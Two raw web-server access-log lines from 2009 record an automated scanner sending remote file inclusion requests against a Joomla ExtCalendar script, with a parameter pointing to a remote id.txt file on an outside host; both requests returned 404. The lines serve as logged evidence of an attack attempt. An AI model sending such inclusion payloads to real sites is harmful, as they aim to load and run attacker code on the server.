219.85.63.226 - - [30/Jan/2009:10:06:55 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:06:55 -0800] "GET /logs/access_080216.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
